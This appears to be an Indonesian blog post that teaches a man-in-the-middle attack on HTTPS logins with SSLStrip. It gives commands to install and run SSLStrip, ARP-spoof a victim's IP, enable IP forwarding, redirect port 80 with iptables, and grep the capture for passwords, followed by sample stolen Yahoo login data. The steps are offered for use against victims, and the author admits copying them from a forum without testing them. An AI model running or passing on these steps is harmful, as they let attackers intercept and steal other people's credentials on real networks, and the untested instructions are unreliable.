Hacking https connection menggunakan SSLStrip



Hacking https connection menggunakan SSLStrip

Https (http over SSL) sebenarnya adalah protokol yang sangat aman, protokol ini menjamin keamanan data dari browser hingga web server. MITM attack (man in the middle) tidak bisa dilakukan terhadap https karena https memiliki fitur authentication sehingga attacker tidak bisa menyamar sebagai web server. Walaupun mitm attack tidak bisa dilakukan terhadap https, namun attacker tetap bisa menyerang user yang menggunakan http sebagai pintu masuk menuju https.
Untuk keterangan lebih lanjut di lihat
di sini Dalam artikel ini saya akan jelaskan tentang SSLStrip, sebuah tool yang dibuat oleh Moxie Marlinspike untuk melakukan serangan mitm terhadap pengguna situs yang dilindungi dengan https.

Pertama - tama kita harus men-download tool SSLStrip karena menurut sepengetahuan saya SSLStrip merupakan tool tambahan dan tidak terdapat dalam bundel Linux.
Cara mengintall SSLStrip:
1.SSLStrip yang di download memiliki extensi .tar.gz dan tentu kita harus meng-extract terlebih dahulu.

$ tar xzvf nama file.tar.gz
2. Setelah di-extract, didalam folder SSLStrip terdapat setup.py yang merupakan python script. Untuk melakukan running pada setup.py dapat dilakukan command di bawah ini

$ python setup.py install

3. Tunggu beberapa menit, maka proses instalasi akan selesai dan SSLStrip dapat digunakan.

Cara menggunakan SSLStrip:
1.jalankan ssl strip :
Quote:
root@h4ck:~# sslstrip -a -w laharisi

2.lakukan arpspoof terhadap victim
Quote:
root@h4ck:~# root@h4ck:~# arpspoof -i vmnet1 -t 192.168.1.200 192.168.1.5

akftifkan fungsi ip_forward :
Quote:
root@h4ck:~# echo 1 > /proc/sys/net/ipv4/ip_forward

3.redirect port victim ( 80 ) ke port sslstrip (10000)
Quote:
root@h4ck:~# iptables -t nat -A PREROUTING -p tcp --dport 80 -j REDIRECT --to-port 10000

4.ketika victim melakukan browsing misalnya mail.yahoo.com,maka kita bisa melihat username dan password loginnya..caranya buka file dump ( laharisi ),
Quote:
root@h4ck:~# cat laharisi | grep -i "passwd="
url+="?";if(valid_js()){var passwd=form.passwd.value;var challen
function hash2(form){var passwd=form.passwd.value
2009-06-30 19:22:34,004 SECURE POST Data (login.yahoo.com): .tries=1&.src=ym&.md5=&.hash=&.js=&.last=&promo=&.intl=us&.bypass=&.partner=&.u=1esn43t54k0a5&.v=0&.challenge=EzdOJPTgncnTmCU_K.IjpAtfSawf&.yplus=&.emailCode=&pkg=&stepid=&.ev=&hasMsgr=0&.chkP=Y&.done=http%3A%2F%2Fmail.yahoo.com&.pd=ym_ver%3D0%26c%3D%26ivt%3D%26sg%3D&login=bl4ck.4ngle&passwd=disambunyikan&.save=Sign+In

kita bisa melihat bahwa username = bl4ck.4ngle dan password = disembunyikan

Cara pengguaan di atas masih copy paste dari Forum yang saya ikuti dan belum sempat saya praktekan, tetapi pastinya postingan ini akan saya perbaiki setelah saya mempraktekannya.
Terima Kasih..
Semoga Bermanfaat..

Category: 0 komentar

0 komentar:

Posting Komentar